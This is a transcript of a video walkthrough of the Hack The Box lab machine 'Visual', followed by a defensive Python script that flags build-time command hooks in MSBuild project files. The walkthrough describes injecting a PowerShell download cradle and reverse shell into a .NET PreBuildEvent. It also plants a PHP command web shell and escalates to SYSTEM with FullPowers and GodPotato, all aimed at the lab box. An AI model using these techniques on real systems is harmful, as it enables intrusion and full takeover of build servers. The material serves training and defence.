HackTheBox - Visual
Key Takeaways
Exploits a .NET compiler using a pre-build event to inject malicious code and gain remote code execution
Full Transcript
What's going on YouTube, this is IppSec. I'm doing Visual from Hack The Box, which gets its name because the web app is a service that remotely uses Visual Studio to compile .NET apps, so you can just upload your project file and then it will output the compiled binary. However, most compilers, including Visual Studio, have something called pre-build events that let you run code before the compiler does, so you can sneak in command injection and get code execution on the box. Once you land on the box you realize you're not the web user, so you switch over to the web user by dropping a shell in the web directory, and that enables you to get to a service that has the SeImpersonate privilege. However, it is disabled because you're just local service. You can use the FullPowers binary that uses a scheduled task which restores all your capabilities, and that lets you get SeImpersonate, where you can use GodPotato, which is the latest in potato attacks, to escalate to root. So with all that being said, let's just jump in.

As always we're going to start off with an nmap, so -sC for default scripts, -sV enumerate versions, -oA output all formats, put in the nmap directory and call it visual, then the IP address of 10.10.11.234. This can take some time to run so I've already ran it. Looking at the results, we have just one port open, that is HTTP on port 80. Its banner tells us it's Apache running on a Windows server, which is a bit odd, and that it also has PHP, so this is definitely an odd combination for Windows. I'm used to it being IIS and not allowing PHP, but hey, let's just go check out the website. So I'm going to do HTTP then the IP address of 10.10.11.234, and the banner tells us "Welcome to Visual, a revolutionary approach to Visual Studio project compilation with Visual". So I guess the box's name is Visual because it hosts Visual Studio on the back end, and it also tells us they only support .NET 6.0 and C# programs, so make sure the repo includes a .sln file, which is a solution file, for successful compilation.

Scrolling down a little bit, it wants us to submit a repo, so what I'm going to do is stand up a web server real quick because I want to see what the request is it makes back to us, right. So I'm going to do python3 -m http.server and then I'm going to say, of course, 10.10.14.8:8000, because that's where the HTTP server is listening, and then we'll say ippsec and test, because a lot of Git likes username and then project, so I want to make sure my thing obeys that naming convention. And then we see a build is being compiled, please be patient, and then looking back here we just see nothing yet, so I'm going to give it some time. I like just waiting like a minute to see if anything happens. I'm guessing it's going to happen before that minute's up, but we'll see. And the main thing I want to see is: does it just make a request to the .git folder and then pull the Git file, or is it going to use a different form of the Git protocol, because that's going to tell me what my next step is. If it's just going in the .git file and then pulling the repo that way, then I can just build a repo and host it on this HTTP server. If it does it through other methods, I'm going to have to stand up my own Git repository for it to work.

And we can see the request does come in, and we have it making a refs request, and it says the service is git-upload-pack, so this is actually taking advantage of a Git service, right. So my first thing is I just want to Google this to see if it's like standard RFC or specific to maybe Gogs, Gitea, GitLab, there's a lot of various Git repos, right, and this just looks like it is going to be standard Git, so we can stand up any type of repository on our own, and the easiest one I think is always going to be Gitea or Gogs. If I just do Gitea Docker Hub it will give us how to install it with Docker, and I love using Docker for things like this because it just makes life so easy. We don't have to like host anything on our box, and, well, we host it on our box but we don't mess up our file system because it's all in a container, so that way if we screw things up too much we just delete the container and move on with our lives, right.

So I'm going to do a docker pull gitea/gitea because that's where the image was. I already have it so it went really quickly. So now all we have to do is a run. So if I do docker run, I'm going to do -d so it starts detached, I'm going to then do -p, port 3000, 3000, and what this is going to do is listen on my localhost and forward it to 3000 on the container, which is the default port Gitea runs on. You could probably get that from here as well: in this docker-compose file they're exposing 3000, and they're also exposing port 222 to 22, and the reason why these are different is because your local box probably is already listening on 22, so they do 222 so it doesn't conflict with the SSH on your box, right, and that goes to the container's 22. So if we run this, I'm also going to add a --rm so as soon as I stop this container it deletes the image, because we don't need to store any of the files. We see it just gives us the hash, and now if I do localhost port 3000 we have a Gitea instance. I'm just going to click Install Gitea and then we can register an account as soon as it's up, right. We have it loading there, where it's user login. Let's create our account. I'll say ippsec, root@ippsec.rocks, password of password, then we register the account and now we're in.

So all I have to do is create a repository now, and I'll create this, name it PleaseSubscribe, create it, and then if we do a git clone here we have our repo, right. So the next thing it wanted us to do is create a .NET project file, right, and my box is kind of lucky because I already had .NET installed and it's version 7, which the server did have, but if you were to do this now you may install .NET 8, which would not work on the server, and it's a real pain to manage multiple versions of .NET just locally. There's probably a good way to do it, I don't really know how. The easiest way I know is to use Docker, right. So I want to install a Docker container that's only using .NET 6 because that's what the website tells us, but if you had .NET 7 it would also work. Probably .NET one through, or two through five would also work because it's backwards compatible, but let's just do Microsoft Docker dotnet 6. Now let's see what this does. Let's see, .NET runtime, let's see, there we go. So we can do this docker pull command, and my box already says I have it so it just went quickly. It'd probably take a minute for you. And since we have this runtime now we can do a docker run, and then I'm going to specify -it for interactive, I'm going to do -v for volume, I'm going to share my current working directory with /mount, specify... oh, did not want to do that. Let's copy this, then we want to say the runtime 6.0, and then I think I just do bash and it will put me at a prompt. There we go.

So here I have my container. If I go to /mount, it's shared with my host right now, so what that's going to allow me to do is all the dotnet commands to make a project, right. So the first thing you want to do is dotnet new console. Command not... oh. dotnet console new. dotnet help. That is weird. dotnet new console. "No .NET SDKs were found." I'm in the .NET container. docker images. So instead of doing the runtime we want to do the SDK, so when you went to the pull, replace runtime with SDK and that should work. So if we do dotnet new console here, there we go. SDK is software development kit, runtime is just so you can run .NET applications, right, so it makes sense why we needed the SDK.

So now that we have the project, we can cat it to see what this looks like. It's just going to point us to .NET 6.0, and then the Program.cs file is just a hello world. If I do dotnet run it will compile this application and run it. Awesome. The next thing we need to do is make that .sln file, because the website tells us we need it, the solution file. So if I just do dotnet new sln, it says the solution file was created, and if I just cat it, it doesn't link to a current csproj file, right. So what we want to do is say dotnet sln help, and it's going to say we want to give it the solution file, then we can do add and give it the project file. So let's do dotnet sln, the sln file, which is mount.sln. I probably should have made this a different name. It's just taking mount because that's the directory we're in, but it doesn't really matter what the name is, it's just going to be a little bit confusing. So what we did is give the sln file, add the csproj file, and we see it has been added to the solution.

So now if I go to my PleaseSubscribe directory we have the Visual Studio project directory. I'm going to make a .gitignore file and we're going to ignore bin and obj, because those are just there because I did the dotnet run command, right. We could show that real quick: so if I do rm -rf bin and obj, those don't exist; dotnet run, and it's going to create those directories, and like bin, we see that's where the executable actually exists, right. I think it's in mount, it's probably... this is the executable, I'm guessing. Let's do a file against it. We don't have that, we can just do it on our host. Debug... ELF. Oh, it's an ELF file because we're on Linux. I did not expect that, I thought it was going to be an exe. mount.csproj, our format is Exe. find . -name *.exe. I guess it made an ELF file. I don't think that matters too much.

So let's see, the next step we need to do is git add . to add all the files to the Git repo. We can commit, give it the message, doesn't really matter here, I'm going to say initial commit, then we can git push and then put our Gitea credentials, and now on Gitea all the files will be here. So if I refresh we have our project: we have the solution file, the csproj file and Program. So now let's copy this and then we'll go back here and do HTTP, 3000, then ippsec/PleaseSubscribe. And before I do that I want to get logs of our Gitea instance, so if I do docker logs b25... b257... 4, 5, there we go. This is going to give me standard out of this container, so I'm just going to do a -f to follow, hit enter a few times, then we're going to send this, and we can wait probably a minute for the server to make a request to us.

And I guess while this goes we can talk about what the next step is, because it kind of takes some time. The project file is going to tell the compiler what to do, and there are some dangerous options in this. Whenever you open like a project from somewhere you don't trust, it asks "do you trust this repository", because if you don't, it's not going to run a lot of the things. One of the most dangerous ones is called a pre-build event. I'm just going to Google pre-build event .NET and that should get me to what I want. Let's see, here's the documentation, and let's see what it is. So this is how you can call it: so we give a Target name, PreBuild, PreBuildEvent. We could also do it without the target, so we could just call it like in the PropertyGroup. This says read only, let's get out of here so it's not read only. Maybe I could do sudo vi mount.csproj. Okay, now I can write. So if I do PreBuildEvent we can run a command here, so I'm just going to say touch pwned, and we're going to end it, PreBuildEvent, like this.

And then if we go back to the Docker container, and we can see the web server made a request to us. We'll look at the output of the web server in just a minute, but back on the Docker container, if I look at this there's a pre-build event, right. So if I do a find / -... did I call it pwned? Yeah, I did pwned. That doesn't exist anywhere, right. So now I do dotnet run and it's going to print hello world. I do -name pwned, it now exists because it ran this before it built.

And you may think this is like a vulnerability, what is a legitimate use case for this, and there's a lot of times when you just want to do things before. For instance, I mostly use this when writing like C2s, because if I'm not using a malleable config (if you don't know what that is just go to ippsec.rocks, type malleable config and watch that video), but let's say I'm creating a file and I have config.h. I really hate Docker sometimes because it doesn't have vi. I could like define a variable, let's say decryption key, and I want this to be encrypted, right, but I don't want to like always put that encrypted text here, I want this to be easily changeable, right. So what I would do is just leave that blank and then put a comment here, and then I could say decrypt and then the plain text here. So I would have a pre-build event of bash, PowerShell, whatever, looking for all comments that have "decrypt:" and then text, and then what it would do is, "oh, I see this plain text, now I'm going to put the encrypted value here", and of course the compiler is always going to remove all comments so that doesn't make it into the executable, and what you're left with is just a bunch of encrypted things. And decryption key is a bad one, we could say like C2 URL or something, right, and that way you don't have plain text strings in your executable because the pre-build event takes the plain text and always puts the encrypted value in there, right.

And I know what you're thinking now, that's not really a legitimate use case because we're using this for malware, right. Well, I do like a lot of gRPC stuff with Golang and that's another time where I would use this, right. I think I have an example here, let's see, proto example. So in Golang if you do like gRPC you're probably used to having these protobuf files, right, and this is just a simple config that you run through a program to create essentially a header file that gives you a lot more functions, right. This is going to stand up an RPC service named Greeter and then it has two functions, SayHello and SayHelloAgain, and SayHello is going to take in a HelloRequest, which has the variable name; SayHelloAgain, pretty much the same thing; and that's how it returns, right, HelloReply. So what we do here is we just do protoc and then give it the proto file and, I think, --go_out. There we go, thank God it did not error, and that automatically generates this code. So if I do a less against it we can see it's creating a bunch of magic for us. We have like the Reset function, the String, it just is a lot of code here, right, and every time the protobuf file updates we have to run that protoc command. So if we just wanted to have the program compile the protoc command before building the Go program, we would use a pre-build event, right. So that is one of the more legitimate use cases for it. Hopefully that all makes sense and you enjoyed that tangent. Always let me know in the comments if you do.

So let's see, where were we. Okay, we want to see what the website said. So it says your build failed, here are the lines with errors. If we go to toggle code, scroll all the way down, let's see. So it looks like it actually wants something in the obj, so what I'm going to do is undo the .gitignore and just give it this obj directory, because it's trying to get this project.assets.json file. I'm guessing maybe this requires internet or something and it needs it. The other thing I'm noticing is the SDK is 7.0, so maybe I want to switch to seven instead of six, but first things first, let us just... whoops, edit that .gitignore, that's what I want to do. So I'm going to remove the obj, git add ., git commit -m "add objdir", git push, and we can see we added that project.assets.json which it was looking for, and now we will go ahead and redo this, right. If we go back here, it already saved, submit it, and then I'm going to hit enter a few times so we know when the server hits us, and I think I can exit the Docker container, I don't think I need it anymore.

So let us now edit the mount.csproj, and we want to run a more dangerous command than pwned, right. So what I'm going to do is copy, let's do copy /usr/share/nishang/Shells/Invoke... is it PowerShellTcpOneLine.ps1, and I'm going to put it in www and call it rev.ps1. Okay, and let's edit this, and I take this one line and we want to put our IP here, so 10.10.14.8, 9001, because that's where the shell is going to listen. And then what I'm also going to do is use a web cradle to access this file. We could just cat rev.ps1, iconv to UTF-16 little endian, and then base64 -w 0. I thought we could... let's see, iconv -t UTF-16LE. Okay, there's no dash there, I thought there was, UTF-16-LE, but maybe not. And the reason why I do this is this is how PowerShell likes encoding. We could do base64 -w 0 and pass this as the encoded command. The reason why I'm not, and want to use a web cradle, is if Defender flags this I'll never know, but if we use a web cradle then the server will make a request to us, and if we don't get the shell we know Defender probably stopped it, right. So I like having the server reach back to us first, that way we know if we're getting flagged by antivirus. So I'm just going to do it in a file, so we'll call it web cradle, and we can say New-Object Net.WebClient, DownloadString, http://10.10.14.8:8000/rev.ps1. I can't remember if I want this in double quotes or single quotes. I think single quotes would be just fine. So let's do a cat command again, we'll do the web cradle, there we go, copy this, go to our csproj file, and then we can say this. We have to do this with sudo. I should just like take ownership of this file so we no longer have to. So we can do powershell -ec, the base64, and the whole reason why I'm using base64 here is I hate dealing with a bunch of quotes and things I don't know, because they can break unexpected things, so whenever I can use base64 I like doing it.

So now that we have that... oh, the code still errored even after we did it, or did we forget to push? Oh, so this time it errored because Windows doesn't know the touch command. That's interesting, right, so we get the output of our command in that. So let's see what we want to do. Let's make sure we have this, that looks good, so I can say git add ., git commit -m "add malicious prebuild", git push. So now our latest is up there. Hit enter a few times, we can go back, hit submit, and then we want to stand up a web server, and then also want to listen on port 9001. So ideally we should see a request come in and then we would next see the shell, so let's see if that is what happens. There we go, we have it hitting our service, so the next thing, hopefully it makes a request to us. If it doesn't do that then our issue is in the web cradle. Going back here, it still says our build is being compiled, so hopefully everything's working, but I'm starting to lose hope right now because I expected the web cradle to be hit. Well, it still says compiled, so maybe it takes a while to do the git pull and the clone. Oh, there we go, so we had it hit and then we got a reverse shell connection here, right. So awesome. The one thing I wish I did was rlwrap this netcat command so like I could clear the screen and do other things, but oh well.

So if we do whoami, we are the enox user. We could also do whoami /all to see what privileges we have and what groups we're a member of, and it doesn't really look like anything interesting here. Let's see, Get-Process, is that going to be PowerShell to do that, let's see what we have. My main thing I want to do is see if enox is the one running this web server. I'm guessing not, but let's see. Get-Process include owner, this should be it. Let's see, Get-Process. So if we do Get-Process and specify, it was like Apache, right, HTTP... there we go, httpd like that, and I'm going to copy this command. Okay, then we want to Select-Object Name, that's a process name, image, UserName, ConvertTo-Json. This is ugly using WMI but let's try it. So if I echo earners now, I don't know if that worked, so I don't know. I don't think we can see who owns the process, we can only see ourselves. So we know enox is running PowerShell, PowerShell, nssm. This is the Non-Sucking Service Manager, that is a funny name for like a legitimate thing. It's just like a service binary wrapper for Windows to make it easy making services, right. The Non-Sucking Service Manager, the first time I saw that I was like, oh man, that is one troll name. But we see conhost and cmd, so by that logic the HTTP server is running as a different user because we can't see the user.

So let's see if we can escalate to that, right. So whenever I land on a web server I want to see if I can write files. So I'm going to echo a PHP... or let's echo a web shell. Let's do PHP like this and we'll say phpinfo like that, to p.php, and we didn't error and we can see we wrote the file. So now if I go to 10.10.11.234/p.php, we don't get anything, which is odd. We see the PHP tag but it did not execute, and what's happening here is really odd. I wonder if it will work if I just curl this. We don't need any of that stuff, so I'll do curl 10.10.11.234/p.php, xxd, and what we see is, because we created this in PowerShell, it's going to be UTF-16 little endian encoded, and we also got these bytes here, which I don't think is screwing things up, but the Apache module is only looking for an encoded things, so this null byte here is screwing things up. So when we create the p.php we have to make sure encoding is right. So let's go copy our echo command again and then we can say Out-File p.php and -Encoding ascii. So now when I run this command it gets a lot more output because it's no longer UTF encoded, and we have the phpinfo output, right. So now if I just get rid of this view-source and view it, that works. So whenever you're on Windows, if you're dropping a web shell and it's not working as you expect, it's probably going to be an encoding issue, right.

So now we have phpinfo, let's actually just get a shell, it should be easy now. So let's do the echo command again and then we can say system, $_REQUEST, cmd, like that. Awesome. And then we'll write the Out-File just like we did before, refresh the page, it's going to error because it says it wants the variable cmd and we did not supply it. So if I do cmd equals whoami, we are NT AUTHORITY\LOCAL SERVICE. If we do whoami /all, let's do it and view source so line breaks are treated. It looks very similar to this, but because we're local service we can actually escalate to get SeImpersonate privilege, most likely. So let's get an interactive shell here real quick. So I'm going to go to a new pane, and this time I'm not going to forget to run rlwrap, which just improves the reverse shell slightly for Windows, right, it gives me the up and down arrows. So we listen on 9001, and then let's just use our web cradle again. Do we still have the web server up? We don't, let's start it, and then if I cat PleaseSubscribe, mount.csproj, we can grab this PowerShell file. Okay, so we do cmd is equal to our one-liner, and then go back over here and we have a reverse shell, and we are the local service user.

So let's see, try and remember the name. Let's see, .NET GitHub full privilege, let's see, that's not the name. "Restore all privileges local service" in quotes, there we go. FullPowers is what the name of this is. I'm sure if I searched HackTricks long enough I would find a reference to it, but a lot of Windows pen testing is just knowing what tools are available to you. And what's happening here is, when you're local service, Windows is downgrading your tokens so you don't have a lot of dangerous permissions. What this is doing is creating a scheduled task, because when the scheduled task happens, then Windows for some reason doesn't downgrade your token to have less privileges and you get them all restored back, right. So that's what this is just going to automate for us. So I'm going to go ahead and download FullPowers. Let's see, download, let's put it in... this box's name is Visual, we'll put it right in www. Okay, and then I'm going to go to ProgramData because this is normally world writable, and we can say curl 10.1... we probably need to do http://10.10.14.8:8000, it's probably FullPowers.exe, and we'll name it FullPowers.exe. So if I do a dir we have that binary. If I try to execute it and then we do whoami /all, it didn't do anything, but something odd happened, I'm not sure if you noticed. So let's try this again. Let's do FullPowers.exe, and it starts the dummy thread, we create the scheduled task, we get the new token, we create a process as the user, we have this shell here, and then we drop back to PowerShell. So our shell is screwing something up.

If we just use netcat for a shell, that would have worked for us, but I really don't like using netcat if I don't have to. And the default PHP shell I'm used to using, if we do /usr/share/laudanum/php/php-reverse-shell, this one is only supporting Linux. As soon as you run the shell it runs this command and then it would crash because it doesn't support Windows. However, if we Google PHP reverse shell, I'm going to Google Ivan because that's the creator of it, I forget his exact handle, but this brings me to this reverse shell, and this is a much better reverse shell. He credits the original script here, but now it supports Linux, Mac and Windows, so this is one I would definitely recommend saving because it's just a really nice reverse shell to have if you're on a PHP box. So let's download this file and I'm going to rename it to rev.php. We did not rename it. There we go. And then we want to go to the bottom and say shell is going to be 10.10.14.8, 9001. Okay, let's see, I'm going to do rlwrap nc -lvnp 9001, and we want to get back to the web directory, right. Let's see, where is it? Let's just run the command here. If I just restart this shell we'll be in the htdocs, so I can curl http://10.10.14.8 port 8000, rev.php, rev.php. Okay, so let's stand up a netcat listener, and now all I want to do is hit the rev.php file I just uploaded, and we have a reverse shell here, and we're not in PowerShell, but this reverse shell is a bit better. I don't know exactly why the one-liner reverse shell doesn't work, but now, run FullPowers, we see this time it doesn't say something after system32. We do a whoami /all, we have the SeImpersonate privilege. I'm going to exit that. We can do, because I forgot to show right off the start, get it again, whoami /all: we still only had those three privileges to start out, right. It's not like the PHP shell did anything differently other than how it gave us the shell.

So execute this, and with SeImpersonate, privilege escalation is pretty simple, we just have to know the latest potato to use. It started out like... I don't remember all the potatoes. It seems like every year or two a new one is created because Microsoft patches the method. I think GodPotato is the latest one right now. There's also, I think, LocalPotato, which works like... there's just so many. There's like JuicyPotato, there was one after that, there's RoguePotato, there's all the types of potatoes, but I'm going to use GodPotato for this. And let's see, we just want to download GodPotato, we'll say NET4. I'm going to rename it so it's a bit easier to type, and all we do is the command we want to run. So let's see, how do we want to do this. Let's go back to ProgramData, and we can make sure in www we have GodPotato.exe, and we're going to curl http://10.10.14.8:8000, GodPotato, output it to a file, and then we execute it and we say -cmd, it says cmd /c and the command we want to run. So let's do a PowerShell one-liner again, grab it from the csproj file, grab this, okay, and that should be it. We run it, it's hanging, and we failed because we're not listening on a port. So there we go, now we're listening, and boom, we get a shell. whoami, now we're the system account. Over on this one we were service, which isn't system; this one is local system. So now I can go Users, Administrator, it's in Desktop probably, and we can get root.txt, right. So that is going to be the box. Hope you guys enjoyed it, take care, and I will see you all next time.
Original Description
00:00 - Introduction
00:50 - Start of nmap
02:00 - Examining the request the server makes to us
04:15 - Using docker to run a Gitea Instance
06:20 - Using docker to install a DotNet Container (make sure it's the SDK!)
09:00 - Using the dotnet CLI to create a project and adding a solutions file to it
13:00 - Having the webapp download our repo, then looking at PreBuildEvents to execute commands before it is compiled
16:00 - Talking about why this PreBuildEvent exists
19:20 - Looking at why our build failed
21:30 - Adding a nishang reverse shell to the prebuild event
26:40 - Reverse Shell Returned!
29:45 - Writing a webshell as Enox, to get a shell as the Apache Service User
34:00 - Using FullPowers to restore our tokens, which will enable the SeImpersonate privilege
36:00 - Grabbing a good PHP Reverse Shell Script that supports Windows!
39:15 - Using GodPotato to abuse the SeImpersonate Privilege and run code as system
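The build-time hook the walkthrough relies on, seen from the side of whoever runs the build service: an added example (not from the video or the box) that statically lists the MSBuild elements in a project file that run commands or pull in external build logic, so an untrusted repo can be rejected or routed to a throwaway sandbox before `dotnet build` touches it. The sample project files and the function name `audit_project` are constructed for illustration.

```python
"""Audit an MSBuild project file for elements that execute at build time."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Properties whose text MSBuild hands to the shell around compilation.
EVENT_PROPERTIES = {"PreBuildEvent", "PostBuildEvent"}


@dataclass(frozen=True)
class Finding:
    kind: str    # event-property | exec-task | inline-task | import
    where: str   # enclosing target, property name or task name
    detail: str  # command text, task factory or imported path


def _local(tag: str) -> str:
    """Drop the XML namespace that old-style project files carry."""
    return tag.rsplit("}", 1)[-1]


def audit_project(xml_text: str) -> list[Finding]:
    """Return every build-time execution hook found in one project file."""
    # A project file never needs a DTD; refusing it also keeps the standard
    # library parser away from entity-expansion input.
    if "<!DOCTYPE" in xml_text.upper():
        raise ValueError("DTD in project file, refusing to parse")
    findings: list[Finding] = []

    def walk(node: ET.Element, target: str | None) -> None:
        name = _local(node.tag)
        if name == "Target":
            target = node.get("Name", "(unnamed)")
        if name in EVENT_PROPERTIES and (node.text or "").strip():
            findings.append(Finding("event-property", name, node.text.strip()))
        elif name == "Exec":
            findings.append(Finding("exec-task", target or "(no target)",
                                    node.get("Command", "")))
        elif name == "UsingTask" and node.get("TaskFactory"):
            # Inline tasks compile and run code embedded in the project file.
            findings.append(Finding("inline-task", node.get("TaskName", ""),
                                    node.get("TaskFactory", "")))
        elif name == "Import" and node.get("Project"):
            # Imported files bring their own targets and need the same audit.
            findings.append(Finding("import", "Import", node.get("Project", "")))
        for child in node:
            walk(child, target)

    walk(ET.fromstring(xml_text), None)
    return findings


# Constructed sample: the two hook styles the video mentions, with harmless
# echo commands in place of a payload.
SAMPLE_HOOKED = """
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <PreBuildEvent>echo prebuild-ran</PreBuildEvent>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="echo exec-ran" />
  </Target>
</Project>
"""

# Constructed sample: what `dotnet new console` produces, no hooks.
SAMPLE_CLEAN = """
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
</Project>
"""

if __name__ == "__main__":
    for label, text in (("hooked", SAMPLE_HOOKED), ("clean", SAMPLE_CLEAN)):
        hits = audit_project(text)
        print(f"{label}: {'REJECT' if hits else 'ok'}")
        for hit in hits:
            print(f"  {hit.kind:15} {hit.where:15} {hit.detail}")
```

A clean result only means none of these known hooks are present in that one file; the build itself still belongs in an isolated, unprivileged, network-restricted worker.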